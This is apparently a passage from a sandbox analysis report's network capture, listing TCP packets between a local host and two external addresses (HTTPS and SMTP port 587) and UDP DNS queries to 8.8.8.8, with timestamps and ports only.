Apr 12, 2021 12:32:15.962346077 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.962385893 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.964082956 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.964215040 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.964242935 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.964459896 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.966075897 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.966114998 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.966160059 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.966187000 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.968053102 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.968097925 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.968173981 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.968204975 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.970046043 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.970088005 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.970128059 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.970169067 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.972073078 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.972117901 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.972140074 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.972177982 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.974195957 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.974239111 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.974256039 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.974282026 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.976084948 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.976128101 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.976150036 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.976174116 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.988744020 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.988801956 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.988838911 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.988867044 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.989187956 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.989231110 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.989249945 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.989285946 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.990650892 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.990710020 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.990720987 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.990753889 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.991200924 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.991246939 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.991261959 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.991322041 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.991357088 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.991414070 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.991421938 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.991468906 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.991782904 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.991846085 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.991847038 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.991889954 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.991890907 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.991929054 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.991944075 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.991978884 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.992207050 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.992250919 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.992252111 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.992295980 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.996016026 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.996062040 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.996087074 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.996115923 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.997364044 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.997436047 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.997436047 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.997508049 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.998528957 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.998570919 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.998589039 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.998620033 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.001594067 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.001637936 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.001663923 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.001713037 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.003261089 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.003307104 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.003350019 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.003376007 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.007026911 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.007071018 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.007150888 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.007178068 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.007227898 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.007268906 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.007289886 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.007347107 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.011231899 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.011276960 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.011297941 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.011337996 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.012242079 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.012284994 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.012353897 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.012428999 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.012923002 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.012964964 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.012995005 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.013029099 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.013237000 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.013278008 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.013339043 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.013364077 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.013473034 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.013513088 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.013560057 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.013596058 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.014565945 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.014607906 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.014636993 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.014661074 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.015522003 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.015562057 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.015620947 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.015635014 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.016419888 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.016460896 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.016496897 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.016513109 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.017556906 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.017596006 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.017683983 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.017719030 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.018516064 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.018556118 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.018614054 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.018640041 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.019536018 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.019577980 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.019650936 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.019671917 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.020508051 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.020550966 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.020623922 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.020652056 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.021452904 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.021497011 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.021531105 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.021563053 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.022384882 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.022430897 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.022460938 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.022495031 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.023740053 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.023782969 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.023859978 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.023890018 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.024517059 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.024580002 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.024656057 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.024698973 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.025249958 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.025290966 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.025352955 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.025424004 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.026221037 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.026279926 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.026329041 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.026376009 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.027177095 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.027219057 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.027266026 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.027308941 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.027970076 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.028011084 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.028068066 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.028126001 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.028923035 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.028964043 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.029014111 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.029057980 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.029977083 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.030016899 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.030086994 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.030145884 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.030772924 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.030813932 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.030875921 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.030910969 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.034375906 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.034420967 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.034440994 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.034509897 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.034812927 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.034868956 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.034881115 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.034921885 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.035851002 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.035893917 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.035949945 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.035968065 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.036643982 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.036708117 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.036712885 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.036771059 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.037652969 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.037728071 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.037734985 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.037790060 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.038497925 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.038566113 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.038577080 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.038631916 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.039484024 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.039525986 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.039556980 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.039614916 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.040312052 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.040352106 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.040391922 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.040416956 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.043664932 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.043713093 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.043735027 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.043816090 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.044699907 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.044749022 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.044766903 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.044806004 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.045367002 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.045428991 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.045444965 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.045500994 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.047463894 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.047503948 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.047545910 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.047565937 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.048329115 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.048384905 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.048486948 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.049060106 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.049101114 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.049124956 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.049165010 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.049905062 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.049954891 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.049981117 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.050014973 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.050568104 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.050616980 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.050648928 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.050683022 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.051127911 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.051177025 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.051197052 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.051234961 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.051755905 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.051784992 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:16.051884890 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:16.051948071 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:33:44.371263027 CEST	49773	587	192.168.2.4	185.31.158.175
Apr 12, 2021 12:33:44.468743086 CEST	587	49773	185.31.158.175	192.168.2.4
Apr 12, 2021 12:33:44.468956947 CEST	49773	587	192.168.2.4	185.31.158.175
Apr 12, 2021 12:33:44.695185900 CEST	587	49773	185.31.158.175	192.168.2.4
Apr 12, 2021 12:33:44.695745945 CEST	49773	587	192.168.2.4	185.31.158.175
Apr 12, 2021 12:33:44.697076082 CEST	49773	587	192.168.2.4	185.31.158.175
Apr 12, 2021 12:33:44.792510986 CEST	587	49773	185.31.158.175	192.168.2.4
Apr 12, 2021 12:33:44.792642117 CEST	49773	587	192.168.2.4	185.31.158.175
Apr 12, 2021 12:33:44.793549061 CEST	587	49773	185.31.158.175	192.168.2.4
Apr 12, 2021 12:33:44.793633938 CEST	49773	587	192.168.2.4	185.31.158.175
Apr 12, 2021 12:33:44.794102907 CEST	587	49773	185.31.158.175	192.168.2.4
Apr 12, 2021 12:33:44.794173002 CEST	49773	587	192.168.2.4	185.31.158.175
Apr 12, 2021 12:34:04.058017015 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:34:04.103636026 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:34:04.103874922 CEST	49742	443	192.168.2.4	216.58.215.225

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 12:31:48.197839022 CEST	58028	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:31:48.247685909 CEST	53	58028	8.8.8.8	192.168.2.4
Apr 12, 2021 12:31:48.521337986 CEST	53097	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:31:48.570025921 CEST	53	53097	8.8.8.8	192.168.2.4
Apr 12, 2021 12:31:48.738893032 CEST	49257	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:31:48.787513971 CEST	53	49257	8.8.8.8	192.168.2.4
Apr 12, 2021 12:31:54.372689009 CEST	62389	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:31:54.422895908 CEST	53	62389	8.8.8.8	192.168.2.4
Apr 12, 2021 12:31:55.477492094 CEST	49910	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:31:55.529230118 CEST	53	49910	8.8.8.8	192.168.2.4
Apr 12, 2021 12:31:56.647651911 CEST	55854	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:31:56.709515095 CEST	53	55854	8.8.8.8	192.168.2.4
Apr 12, 2021 12:31:57.860956907 CEST	64549	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:31:57.911808968 CEST	53	64549	8.8.8.8	192.168.2.4
Apr 12, 2021 12:31:58.980928898 CEST	63153	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:31:59.037889957 CEST	53	63153	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:00.471754074 CEST	52991	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:00.532522917 CEST	53	52991	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:01.508951902 CEST	53700	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:01.557921886 CEST	53	53700	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:03.459892988 CEST	51726	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:03.513540983 CEST	53	51726	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:05.327303886 CEST	56794	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:05.384478092 CEST	53	56794	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:07.583515882 CEST	56534	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:07.632533073 CEST	53	56534	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:08.685651064 CEST	56627	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:08.738821030 CEST	53	56627	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:09.854979992 CEST	56621	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:09.903726101 CEST	53	56621	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:14.041749001 CEST	63116	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:14.098901033 CEST	53	63116	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:14.224805117 CEST	64078	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:14.289911985 CEST	53	64078	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:15.361759901 CEST	64801	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:15.410377026 CEST	61721	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:15.426651001 CEST	53	64801	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:15.459176064 CEST	53	61721	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:18.012386084 CEST	51255	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:18.064095020 CEST	53	51255	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:24.734566927 CEST	61522	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:24.795698881 CEST	53	61522	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:31.120017052 CEST	52337	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:31.170082092 CEST	53	52337	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:32.186961889 CEST	55046	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:32.246851921 CEST	53	55046	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:35.226739883 CEST	49612	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:35.276806116 CEST	53	49612	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:36.511339903 CEST	49285	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:36.564383984 CEST	53	49285	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:37.576410055 CEST	50601	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:37.695224047 CEST	53	50601	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:38.229449034 CEST	60875	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:38.289577007 CEST	53	60875	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:38.720961094 CEST	56448	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:38.793565989 CEST	53	56448	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:38.850287914 CEST	59172	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:38.998446941 CEST	53	59172	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:39.472543955 CEST	62420	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:39.532144070 CEST	53	62420	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:40.102365017 CEST	60579	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:40.160980940 CEST	53	60579	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:40.685070992 CEST	50183	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:40.768840075 CEST	53	50183	8.8.8.8	192.168.2.4
